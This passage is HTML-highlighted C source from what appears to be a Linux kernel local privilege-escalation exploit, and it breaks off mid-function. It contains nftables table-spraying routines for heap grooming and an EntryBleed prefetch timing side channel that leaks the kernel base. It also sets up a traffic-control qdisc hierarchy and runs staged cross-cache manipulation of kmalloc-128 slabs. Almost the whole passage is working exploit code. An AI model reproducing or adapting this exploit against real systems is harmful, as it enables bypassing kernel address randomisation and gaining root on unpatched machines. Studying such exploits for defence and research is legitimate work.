    <span class="n">nftnl_batch_begin</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="k">struct</span> <span class="n">nftnl_table</span> <span class="o">*</span><span class="n">table</span> <span class="o">=</span> <span class="n">nftnl_table_alloc</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"nftnl_table_alloc"</span><span class="p">);</span>
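        <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>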
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set table attributes</span>
    <span class="n">nftnl_table_set_u32</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_FAMILY</span><span class="p">,</span> <span class="n">NFPROTO_INET</span><span class="p">);</span>
    <span class="n">nftnl_table_set_str</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_NAME</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>

    <span class="c1">// Set 128-byte userdata</span>
    <span class="n">nftnl_table_set_data</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_USERDATA</span><span class="p">,</span> <span class="n">g_userdata</span><span class="p">,</span> <span class="n">USERDATA_SIZE</span><span class="p">);</span>

    <span class="c1">// Build Netlink message</span>
    <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">msg_hdr</span> <span class="o">=</span> <span class="n">nftnl_table_nlmsg_build_hdr</span><span class="p">(</span>
        <span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
        <span class="n">NFT_MSG_NEWTABLE</span><span class="p">,</span>
        <span class="n">NFPROTO_INET</span><span class="p">,</span>
        <span class="n">NLM_F_CREATE</span> <span class="o">|</span> <span class="n">NLM_F_EXCL</span> <span class="o">|</span> <span class="n">NLM_F_ACK</span><span class="p">,</span>
        <span class="n">seq</span><span class="o">++</span>
    <span class="p">);</span>

    <span class="c1">// Attach table payload</span>
    <span class="n">nftnl_table_nlmsg_build_payload</span><span class="p">(</span><span class="n">msg_hdr</span><span class="p">,</span> <span class="n">table</span><span class="p">);</span>
    <span class="n">nftnl_table_free</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// End batch (one message only)</span>
    <span class="n">nftnl_batch_end</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// Send the batch (one message per batch)</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_sendto</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">mnl_nlmsg_batch_head</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
                          <span class="n">mnl_nlmsg_batch_size</span><span class="p">(</span><span class="n">batch</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_sendto"</span><span class="p">);</span>
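        <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>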
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">recv_len</span> <span class="o">=</span> <span class="n">mnl_socket_recvfrom</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">recv_len</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_recvfrom"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_type</span> <span class="o">==</span> <span class="n">NLMSG_ERROR</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="n">err</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="p">)</span><span class="n">mnl_nlmsg_get_payload</span><span class="p">(</span><span class="n">nlh</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Netlink error: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="o">-</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">));</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Cleanup</span>
    <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
    <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Deletes a single nftables table</span>
<span class="kt">void</span> <span class="nf">delete_table</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error: Table name is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">mnl_socket</span> <span class="o">*</span><span class="n">mnl_sock</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnl_nlmsg_batch</span> <span class="o">*</span><span class="n">batch</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">MNL_BUF_SIZE</span><span class="p">];</span>

    <span class="c1">// Open Netlink socket</span>
    <span class="n">mnl_sock</span> <span class="o">=</span> <span class="n">mnl_socket_open</span><span class="p">(</span><span class="n">NETLINK_NETFILTER</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">mnl_sock</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_open"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Connect to Netlink</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_bind</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MNL_SOCKET_AUTOPID</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_bind"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Initialize Netlink batch</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="n">batch</span> <span class="o">=</span> <span class="n">mnl_nlmsg_batch_start</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>

    <span class="kt">int</span> <span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">nftnl_batch_begin</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="k">struct</span> <span class="n">nftnl_table</span> <span class="o">*</span><span class="n">table</span> <span class="o">=</span> <span class="n">nftnl_table_alloc</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"nftnl_table_alloc"</span><span class="p">);</span>
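        <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>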
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set table attributes</span>
    <span class="n">nftnl_table_set_u32</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_FAMILY</span><span class="p">,</span> <span class="n">NFPROTO_INET</span><span class="p">);</span>
    <span class="n">nftnl_table_set_str</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_NAME</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>

    <span class="c1">// Build Netlink message for table deletion</span>
    <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">msg_hdr</span> <span class="o">=</span> <span class="n">nftnl_table_nlmsg_build_hdr</span><span class="p">(</span>
        <span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
        <span class="n">NFT_MSG_DELTABLE</span><span class="p">,</span>
        <span class="n">NFPROTO_INET</span><span class="p">,</span>
        <span class="n">NLM_F_ACK</span><span class="p">,</span>
        <span class="n">seq</span><span class="o">++</span>
    <span class="p">);</span>

    <span class="c1">// Attach table payload</span>
    <span class="n">nftnl_table_nlmsg_build_payload</span><span class="p">(</span><span class="n">msg_hdr</span><span class="p">,</span> <span class="n">table</span><span class="p">);</span>
    <span class="n">nftnl_table_free</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// End batch</span>
    <span class="n">nftnl_batch_end</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// Send the batch</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_sendto</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">mnl_nlmsg_batch_head</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
                          <span class="n">mnl_nlmsg_batch_size</span><span class="p">(</span><span class="n">batch</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_sendto"</span><span class="p">);</span>
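        <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>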
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">recv_len</span> <span class="o">=</span> <span class="n">mnl_socket_recvfrom</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">recv_len</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_recvfrom"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_type</span> <span class="o">==</span> <span class="n">NLMSG_ERROR</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="n">err</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="p">)</span><span class="n">mnl_nlmsg_get_payload</span><span class="p">(</span><span class="n">nlh</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Netlink error: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="o">-</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">));</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Table name was: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Cleanup</span>
    <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
    <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">spray_tables</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_SPRAY_OBJS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Try to use EntryBleed to leak the kernel base</span>
<span class="cp">#define KERNEL_LOWER_BOUND 0xffffffff80000000ULL
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ULL
</span>
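<span class="c1">// Returns the rdtscp cycle count taken to prefetch addr; lower timings hint that addr is mapped</span>
<span class="kt">uint64_t</span> <span class="nf">sidechannel</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="p">{</span>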
  <span class="kt">uint64_t</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">;</span>
  <span class="n">asm</span> <span class="k">volatile</span> <span class="p">(</span><span class="s">".intel_syntax noprefix;"</span>
    <span class="s">"mfence;"</span>
    <span class="s">"rdtscp;"</span>
    <span class="s">"mov %0, rax;"</span>
    <span class="s">"mov %1, rdx;"</span>
    <span class="s">"xor rax, rax;"</span>
    <span class="s">"lfence;"</span>
    <span class="s">"prefetchnta qword ptr [%4];"</span>
    <span class="s">"prefetcht2 qword ptr [%4];"</span>
    <span class="s">"xor rax, rax;"</span>
    <span class="s">"lfence;"</span>
    <span class="s">"rdtscp;"</span>
    <span class="s">"mov %2, rax;"</span>
    <span class="s">"mov %3, rdx;"</span>
    <span class="s">"mfence;"</span>
    <span class="s">".att_syntax;"</span>
    <span class="o">:</span> <span class="s">"=&amp;r"</span> <span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="s">"=&amp;r"</span> <span class="p">(</span><span class="n">b</span><span class="p">),</span> <span class="s">"=&amp;r"</span> <span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="s">"=&amp;r"</span> <span class="p">(</span><span class="n">d</span><span class="p">)</span>
    <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">addr</span><span class="p">)</span>
    <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rbx"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"rdx"</span><span class="p">);</span>
  <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">b</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">|</span> <span class="n">a</span><span class="p">;</span>
  <span class="n">c</span> <span class="o">=</span> <span class="p">(</span><span class="n">d</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">|</span> <span class="n">c</span><span class="p">;</span>
  <span class="k">return</span> <span class="n">c</span> <span class="o">-</span> <span class="n">a</span><span class="p">;</span>
<span class="p">}</span>

<span class="cp">#define STEP 0x100000ull
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE ((KERNEL_UPPER_BOUND - KERNEL_LOWER_BOUND) / STEP)
</span>
<span class="kt">uint64_t</span> <span class="nf">leak_syscall_entry</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">scan_start</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">scan_end</span><span class="p">)</span> 
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">data</span><span class="p">[</span><span class="n">ARR_SIZE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span>
    <span class="kt">uint64_t</span> <span class="n">min</span> <span class="o">=</span> <span class="o">~</span><span class="mi">0</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="o">~</span><span class="mi">0</span><span class="p">;</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">ITERATIONS</span> <span class="o">+</span> <span class="n">DUMMY_ITERATIONS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">idx</span> <span class="o">&lt;</span> <span class="n">ARR_SIZE</span><span class="p">;</span> <span class="n">idx</span><span class="o">++</span><span class="p">)</span> 
        <span class="p">{</span>
            <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">scan_start</span> <span class="o">+</span> <span class="n">idx</span> <span class="o">*</span> <span class="n">STEP</span><span class="p">;</span>
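            <span class="c1">// 104 is SYS_getgid on x86_64: a cheap syscall to exercise the kernel entry path before timing</span>
            <span class="n">syscall</span><span class="p">(</span><span class="mi">104</span><span class="p">);</span>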
            <span class="kt">uint64_t</span> <span class="n">time</span> <span class="o">=</span> <span class="n">sidechannel</span><span class="p">(</span><span class="n">test</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="n">DUMMY_ITERATIONS</span><span class="p">)</span>
                <span class="n">data</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="o">+=</span> <span class="n">time</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">ARR_SIZE</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">/=</span> <span class="n">ITERATIONS</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;</span> <span class="n">min</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">min</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
            <span class="n">addr</span> <span class="o">=</span> <span class="n">scan_start</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="n">STEP</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Set up our class/qdisc hierarchy</span>
<span class="kt">void</span> <span class="nf">setup_classes</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create root qdisc</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating root qdisc...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo root handle 1:0 drr"</span><span class="p">);</span>

    <span class="c1">// Create class 1:1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating class 1:1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:1 drr"</span><span class="p">);</span>

    <span class="c1">// Create class 1:3</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating class 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:3 drr"</span><span class="p">);</span>

    <span class="c1">// Assign plug qdisc to class 1:1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Assigning plug qdisc to class 1:1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024"</span><span class="p">);</span>

    <span class="c1">// Assign pfifo qdisc to class 1:3</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Assigning pfifo qdisc to class 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo parent 1:3 handle 3:0 pfifo"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Cross cache defines</span>
<span class="cp">#define OBJS_PER_SLAB 32UL  // Number of objects in a kmalloc-128 page
#define CPU_PARTIAL 30UL    // Number of partial pages for kmalloc-128
#define OVERFLOW_FACTOR 4UL // We want to overkill this 
</span>
<span class="c1">// Cross cache globals</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">cc_bucket</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">min</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">max</span><span class="p">;</span>
<span class="p">}</span> <span class="n">cc_bucket_t</span><span class="p">;</span>

<span class="n">cc_bucket_t</span> <span class="n">cc1_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">cc_bucket_t</span> <span class="n">cc2_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">cc_bucket_t</span> <span class="n">cc3_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Cross-cache stage 1: Spray enough objects that we start getting brand new</span>
<span class="c1">// slab allocations in kmalloc-128 and also reserve enough pages that when</span>
<span class="c1">// they are placed on the partials list they will evict empty pages </span>
<span class="kt">void</span> <span class="nf">cc_1</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="p">(</span><span class="n">OBJS_PER_SLAB</span> <span class="o">*</span> <span class="p">(</span><span class="n">CPU_PARTIAL</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">*</span> <span class="n">OVERFLOW_FACTOR</span><span class="p">;</span>

    <span class="c1">// Spray the tables</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">spray_amt</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache stage 2: Allocate enough objects that we probably land somewhere</span>
<span class="c1">// in the middle of a new slab (page) so that our object is probably not the </span>
<span class="c1">// exact first or last object on the page</span>
<span class="kt">void</span> <span class="nf">cc_2</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Take into account cc1 when spraying</span>
    <span class="kt">uint64_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="n">offset</span><span class="p">;</span>
    <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">spray_amt</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache stage 3: Allocate enough objects to complete the victim slab and </span>
<span class="c1">// probably spill over onto a brand new slab</span>
<span class="kt">void</span> <span class="nf">cc_3</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Extra one here for class 1:1?</span>

    <span class="c1">// Take into account cc2 when spraying</span>
